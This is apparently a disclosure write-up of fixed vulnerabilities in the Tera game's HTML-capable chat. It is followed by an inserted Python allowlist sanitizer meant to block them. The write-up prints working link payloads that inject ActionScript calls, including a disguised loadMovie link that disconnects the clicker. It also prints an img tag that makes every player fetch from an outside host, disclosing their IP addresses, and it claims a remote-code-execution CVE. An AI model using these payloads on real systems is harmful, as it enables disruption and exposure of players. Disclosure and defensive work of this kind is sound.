Tera
Chat exploits, PDF version




Author:
Yukikoo & Wuaw

Introduction

All the vulnerabilities in this document were found, reported to the game publisher, and fixed in the LIVE environment some months ago. The game UI is built with Scaleform and ActionScript 2, with an old version of Flash Player embedded. One important detail about the chat: it supports a subset of HTML, plus some custom tags and functionality.

Basis of the exploit

A disassembly of a still-vulnerable version of the chat UI Flash file (S1UI_chat2) can be found here: https://github.com/neowutran/S1UI_chat2/blob/cd09d9dd2ddaab50a1b7cd73fda3bcb8b0e7d34d/S1UI_chat2.asm. In this document I explain how to exploit two HTML tags: the link tag 'a' and the image tag 'img'.

Example of a link you can receive normally in-game

<a href='asfunction:chatNameAction,Yukikoo@0@0'>Yukikoo</a>

The content of the 'href' is interpreted and executed: the 'asfunction:' scheme calls the ActionScript function 'chatNameAction' with the parameters 'Yukikoo', '0' and '0' (encoded in the href as 'Yukikoo@0@0').

Image tag

Example of a picture

<img src='img://abonormality__950165' width='64' height='64' vspace='-7' />

The content of the 'src' is interpreted as well: an 'img://' source is handled by Flash Player's image loading code, which decodes PNG data with the libpng library bundled in Flash.

Link tag exploit: ActionScript injection and DoS

Introduction

This section covers exploits of the link tag only. The target needs to click on the link to trigger the payload.

Example

This example generates a link labelled 'Add a tab in the chat' that adds a new tab to the chat of whoever clicks on it. Such links can be sent between players.

<a href='FSCommand:ToGame_Chat_RequestAddTab'>Add a tab in the chat</a>

In the next example, instead of calling a predefined function, we go through the '_root' object directly and pick whatever function we want. The effect of this link is obvious from the name of the event it dispatches.

<A HREF="asfunction:_root.OnGameEvent,OnGame_ResetUIPosition">Hi</A>

One of my favourite links is this one: we call the 'loadMovie' function with a picture on the network. The Flash file has been flagged not to use the network, so the network call fails and the game client is killed.

<A HREF="asfunction:_root.loadMovie,http://www.google.fr/images/branding/googleg/1x/googleg_standard_color_128dp.png">Get 200x Masterwork Alkahest</A>

So anyone who clicks on this link is disconnected from the server.

Image tag exploit: DoS and remote code execution

Introduction

The Flash file has been tagged not to use the network (in the Flash header), but that restriction does not apply to the libraries Flash Player itself uses. This time we are talking about the libpng library used by Flash.

In this example the game client goes through the Flash internals (and libpng), downloads the picture and displays it. Send this tag on the global chat and every player connected to the server automatically downloads the picture (revealing their IP address to the host serving it), with no need to click on anything, unlike the previous exploit.

Limited exploit

<img src="img://__http://diclah.com/~yukikoo/toto.png" />

This has several consequences. Beyond the IP disclosure already mentioned, on a more hypothetical level (and I don't think anyone used it) it could have been used to DDoS a website: a lot of players are connected to the server, so a single link like that generates thousands of simultaneous connections to a given web resource, and if someone sent hundreds or thousands of such image tags it would generate a lot of traffic.
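Bringing the link-tag and image-tag cases together, the following is an added example, written for this edit and not part of the original writeup or of the game's own code: an allowlist check in Python that a chat relay or client could run over incoming messages before handing them to the Scaleform renderer. The allowlist itself is an assumption derived from the legitimate tags shown above (for links, only 'asfunction:chatNameAction' with a 'name@n@n' argument; for images, only a bare 'img://name' resource containing no ':' or '/'), and the sample messages are constructed from the tags quoted on this page.

```python
"""Allowlist check for chat messages rendered by an HTML-capable Flash UI.
Added example, not from the original writeup or the game: the allowed callee,
argument shape and image-name charset are assumptions taken from the page."""
import re
from typing import Dict, List, NamedTuple

# Constructed samples built from the tags quoted in the writeup (the loadMovie
# href keeps the line break it has on the page).
SAMPLE_MESSAGES = [
    "<a href='asfunction:chatNameAction,Yukikoo@0@0'>Yukikoo</a>",
    "<img src='img://abonormality__950165' width='64' height='64' vspace='-7' />",
    "<a href='FSCommand:ToGame_Chat_RequestAddTab'>Add a tab in the chat</a>",
    '<A HREF="asfunction:_root.OnGameEvent,OnGame_ResetUIPosition">Hi</A>',
    '<A HREF="asfunction:_root.loadMovie,\n'
    'http://www.google.fr/images/branding/googleg/1x/googleg_standard_color_128dp.png"'
    '>Get 200x Masterwork Alkahest</A>',
    '<img src="img://__http://diclah.com/~yukikoo/toto.png" />',
]

# Opening <a ...> / <img ... /> tags in any case; the renderer acts on the
# attribute values, so those are what get audited.
OPEN_TAG_RE = re.compile(r"<(?P<tag>a|img)\b(?P<attrs>[^>]*?)/?>", re.IGNORECASE)
# A closed link with its visible text, used to degrade a bad link to plain text.
LINK_RE = re.compile(r"<a\b(?P<attrs>[^>]*)>(?P<text>.*?)</a>", re.IGNORECASE | re.DOTALL)
# Quoted attributes only: an unquoted href never lands in the dict and is
# therefore rejected (fail closed).
ATTR_RE = re.compile(r"""(?P<name>[A-Za-z_:-]+)\s*=\s*(?P<q>["'])(?P<value>.*?)(?P=q)""", re.DOTALL)

# Assumption: the only asfunction callee chat needs, with its argument shape
# (player@n@n, as in the legitimate link above).
ALLOWED_CALLS = {"chatnameaction": re.compile(r"""^[^@,<>"']{1,32}@\d{1,6}@\d{1,6}$""")}
# Assumption: a legitimate image is a bare resource name. No ':' or '/' means
# no URL can ride behind the 'img://' prefix.
IMG_NAME_RE = re.compile(r"^img://[A-Za-z0-9_]{1,64}$")

Finding = NamedTuple("Finding", [("tag", str), ("value", str), ("allowed", bool), ("reason", str)])

def check_href(href: str) -> Finding:
    """Accept only asfunction:<allowed callee>,<well-formed args>."""
    scheme, sep, rest = href.partition(":")
    if not sep:
        return Finding("a", href, False, "href has no scheme")
    if scheme.strip().lower() != "asfunction":
        # FSCommand:, http: and friends are never legitimate chat data.
        return Finding("a", href, False, f"scheme {scheme.strip()!r} not allowed")
    callee, _, args = rest.partition(",")
    callee = callee.strip()
    # A dotted path such as _root.loadMovie escapes the chat's own API, and so
    # does any function that is not explicitly allowed: allowlist, not denylist.
    if "." in callee or callee.lower() not in ALLOWED_CALLS:
        return Finding("a", href, False, f"callee {callee!r} not allowed")
    if not ALLOWED_CALLS[callee.lower()].match(args.strip()):
        return Finding("a", href, False, "arguments do not match expected shape")
    return Finding("a", href, True, "ok")

def check_src(src: str) -> Finding:
    """Accept only a plain img://<name> resource, never anything URL-like."""
    if IMG_NAME_RE.match(src.strip()):
        return Finding("img", src, True, "ok")
    return Finding("img", src, False, "src is not a plain img:// resource name")

def _attrs(raw: str) -> Dict[str, str]:
    attrs: Dict[str, str] = {}
    for a in ATTR_RE.finditer(raw):
        name = a.group("name").lower()
        if name in attrs:  # repeated attribute: which copy the renderer uses is unknown
            attrs["__duplicate__"] = name
        attrs[name] = a.group("value")
    return attrs

def _check_tag(tag: str, attrs: Dict[str, str]) -> Finding:
    if "__duplicate__" in attrs:
        return Finding(tag.lower(), attrs["__duplicate__"], False, "duplicate attribute")
    if tag.lower() == "a":
        return check_href(attrs.get("href", ""))
    return check_src(attrs.get("src", ""))

def audit(message: str) -> List[Finding]:
    """One Finding per interpreted tag, closed or not."""
    return [_check_tag(m.group("tag"), _attrs(m.group("attrs"))) for m in OPEN_TAG_RE.finditer(message)]

def is_safe(message: str) -> bool:
    return all(f.allowed for f in audit(message))

def sanitize(message: str) -> str:
    """Keep allowed tags, degrade a bad link to its text, drop bad images. The
    second pass also removes an unclosed <a ...> the first pass could not pair."""
    def fix_link(m):
        return m.group(0) if _check_tag("a", _attrs(m.group("attrs"))).allowed else m.group("text")

    def fix_open(m):
        return m.group(0) if _check_tag(m.group("tag"), _attrs(m.group("attrs"))).allowed else ""

    return OPEN_TAG_RE.sub(fix_open, LINK_RE.sub(fix_link, message))

if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        for f in audit(msg):
            print(f"{'ALLOW' if f.allowed else 'BLOCK'} <{f.tag}> {f.reason}: {f.value!r}")
        print("   ->", sanitize(msg).replace("\n", " "))
```

The check is an allowlist rather than a denylist of '_root', 'FSCommand' and 'loadMovie': any other function reachable through 'asfunction:' would still be an injection, and any 'src' that is not a bare resource name could still point the client at a URL. Refusing URL-like sources also removes the delivery path the text describes for the libpng bug, since the client can then only decode images that ship with the game. Anything the parser cannot interpret with certainty (an unquoted attribute, a repeated 'href', a stray '>' inside a value) is rejected rather than guessed at, because the Flash renderer's own parsing rules are what an attacker would be probing.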

CVE-2017-3077

The chat system is also vulnerable to CVE-2017-3077.

This CVE can be used to crash everyone connected to the server. The far bigger impact, though, is that it allows remote code execution on everyone running the game. The payload can be broadcast to everyone connected to the server with the 'megaphone' chat function, but also through the other chat channels. In some regions the game runs as Administrator, so the impact of this CVE is even greater.

References

Some interesting links can be found here: